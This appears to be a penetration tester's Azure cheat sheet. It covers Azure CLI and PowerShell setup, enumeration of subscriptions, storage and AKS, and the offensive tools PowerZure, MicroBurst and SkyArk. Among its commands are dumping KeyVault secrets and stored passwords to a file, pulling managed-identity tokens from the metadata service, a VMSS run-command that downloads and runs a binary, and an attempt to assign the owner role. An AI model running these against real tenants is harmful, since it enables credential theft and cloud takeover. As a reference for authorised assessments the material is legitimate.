Getting Started

Install latest version of Azure CLI on Mac

brew update && brew install azure-cli


Install latest version of Azure CLI on Linux

curl -sL | sudo bash


Install PowerShell

brew install --cask powershell-preview

Run a powershell terminal with:


Update Powershell

brew update
brew upgrade powershell-preview --cask

Uninstall Powershell

brew uninstall --cask powershell
sudo rm -rf /usr/local/bin/pwsh-preview /usr/local/microsoft/powershell


Install Azure PowerShell module

For the current user:

if ($PSVersionTable.PSEdition -eq 'Desktop' -and (Get-Module -Name AzureRM -ListAvailable)) {
    Write-Warning -Message ('Az module not installed. Having both the AzureRM and ' +
      'Az modules installed at the same time is not supported.')
} else {
    Install-Module -Name Az -AllowClobber -Scope CurrentUser


Setup the AzureRMAlias module

This will deal with incompatibilities with older scripts that use AzureRM:


List available modules

Get-Module -ListAvailable

Get authenticated in Powershell


List commands in a module

Get-Command -Module <module name>

List functions in a module

Get-Command -Module <module name> -Type Function


Authenticate via the CLI

Run this command to get authenticated:

az login

This will result in a web browser opening, or a URL prompt. Navigating to this url will prompt you for a code, which you’ve been provided in the command line. Paste it in, click next, and select the proper account.


Info Gathering

List subscriptions for authenticated account

az account list

Get tenant id

az account list | jq '.[].tenantId'

Get subscription id

az cli:

az account list | jq '.[].id'



Resources: - powershell docs - cli docs

List tenants

az account tenant list

List Resource Groups by name

az group list | jq -r '.[].name'


Set Subscription

az cli:

az account set -s <name or id>


Set-AzureSubscription -Id [Subscription ID]

Resource: - cli

List all VMs

az vm list


Blob Storage

List all storage accounts and output in a table format:

az storage account list -o table

List all storage accounts and get storage account names:

az storage account list -o json | jq -r '.[].name'

You can assign one of the account names to an env var if you’d like:

export AZURE_STORAGE_ACCOUNT=<storage account name from output>

Get storage keys

If you set the env var:

az storage account keys list -n $AZURE_STORAGE_ACCOUNT

You can assign one of the keys to an env var if you’d like:

export AZURE_STORAGE_KEY='<your key from the output of the previous command>'

List storage containers

az storage container list --account-name $AZURE_STORAGE_ACCOUNT --account-key "$AZURE_STORAGE_KEY"

List storage container contents

az storage blob list --container-name <name of storage container from previous command> --account-name $AZURE_STORAGE_ACCOUNT --account-key $AZURE_STORAGE_KEY


List blob names

az storage blob list --container-name <name of storage container from previous command> --account-name $AZURE_STORAGE_ACCOUNT --account-key $AZURE_STORAGE_KEY | jq '.[].name'

Azure Kubernetes (k8s)

Get available versions of k8s in a region

REGION=westus2 # This will vary depending on the region you're using
az aks get-versions --location $REGION -o table


List managed k8s clusters

az aks list


Get Resource Group Name for clusters

AZ_RESOURCE_GROUP_NAME=$(az aks list | jq -r '.[].resourceGroup')

Get Cluster Name

AZ_CLUSTER_NAME=$(az aks list | jq -r '.[].name')

Configure kubectl

This is pretty awesome, good job Microsoft:

az aks get-credentials --resource-group $AZ_RESOURCE_GROUP_NAME --name $AZ_CLUSTER_NAME


Security Auditing

ScoutSuite will generate an HTML report outlining various issues that exist in the configuration for a given account.


git clone
cd ScoutSuite
pipenv --python 3
pipenv shell
pip install -r requirements.txt


python azure --cli



git clone
cd PowerZure

# Authenticate

# Import PowerZure
# impo is shorthand for Import-Module
ipmo ./PowerZure.ps1

# If you have multiple subscriptions, set the one you want to target:
Set-AzureSubscription -Id [Subscription ID]

# Enumerate all roles

# Enumerate resources the current user has access to

# Show info about current user

Resources: - fix the weird error that comes up for Importing the AzureADPreview module - fix missing modules like Get-AzureADDirectoryRole

Show all functions

powerzure -h 

Get help for a particular function

For example:

get-help Get-AzureTargets

Get all content from all KeyVaults

Show-AzureKeyVaultContent -All

Resource: - PowerZure general usage info

Create a new user

New-AzureUser -Username '' -Password reallyAwesomePassword123!


git clone
cd MicroBurst


# Authenticate

# Import MicroBurst
ipmo ./MicroBurst.psm1

# Install module for Out-GridView
Install-Module Microsoft.PowerShell.GraphicalTools

# Show commands
Get-Command -Module MicroBurst

# Dump info from an Azure subscription
**Note:** Be sure to click a row in the pop up before clicking **Export**
Get-AzDomainInfo -folder MicroBurst -Verbose

# Look for creds or certificate stores in a number of places and dump them to `secrets.txt`
**Note:** Be sure to click a row in the pop up before clicking **Export**
Get-AzPasswords -Verbose | Out-File -FilePath ./secrets.txt

# Dump Key Vault Keys and Secrets from an Azure subscription via Automation Accounts specifically
**Note:** Be sure to click a row in the pop up before clicking **Export**
Get-AzKeyVaultsAutomation -Verbose

Resource: - where I found out about the tool initially - write output to a file


git clone
cd SkyArk
Import-Module .\SkyArk.ps1 -force


Azure AD

List all applications

az ad app list --output=table --query='[].{Name:displayName,URL:homepage}'

List all service principles

az ad sp list --output=table --query='[].{Name:displayName,Enabled:accountEnabled,URL:homepage,Publisher:publisherName,MetadataURL:samlMetadataUrl}'

List all groups

az ad group list --output=json --query='[].{Group:displayName,Description:description}'



View all VMSS in a subscription

Simply navigate to this page and use the magical Try it button to use the REST API to grab this info. Neat!


az vmss list

Get VMSS by name and associated resource group

az vmss list | jq '.[].name, .[].resourceGroup'

List vms in a VMSS

az vmss list-instances -n $VMSS_NAME -g $RESOURCE_GROUP


Get computer name of vms in a VMSS

az vmss list-instances -n $VMSS_NAME -g $RESOURCE_GROUP | jq '.[].osProfile.computerName'

Run command in VM in a VMSS

This will run commands in the instance with an id of 0. See the above commands for how to get the id that corresponds to the instance you want to work with.

az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'echo $1 $1' --parameters hello world

Run whoami:

az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'whoami'

Run download and run a binary as a background job:

az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'bash -c "cd /tmp && wget && chmod +x binary && ./binary &"'

Resources: - run command on a VMSS instance

Metadata Service

Get all instance metadata

curl -s -H Metadata:true --noproxy "*" ""

Get access token

curl -s -H Metadata:true --noproxy "*" "" 

Resources: - official docs - a bunch of endpoints you can get to - get access token

Request storage account token

# Get OAuth Token
TOKEN=$(curl -s "" -H Metadata:true | jq -r '.access_token')

# Get subscription id
SUB=$(curl -s -H Metadata:true --noproxy "*" "" | jq -r '.compute.subscriptionId')

# Get list of storage accounts
curl -s -H "Authorization: Bearer $TOKEN" -H Metadata:true "$SUB/providers/Microsoft.Storage/storageAccounts?api-version=2021-06-01"

Resources: - powershell script I used

Get AKS node IP

curl -s -H Metadata:true "" | jq -r .network.interface[].ipv4.ipAddress[].privateIpAddress



Create new role assignment

This will try to assign the assignee the owner role:

az role assignment create --assignee <user or service principal> --role "owner"



Show registered features in a table format:

az feature list -o table

Find features associated w/ ContainerService

az feature list -o table --query "[?contains(name, 'Microsoft.ContainerService')].{Name:name,State:properties.state}"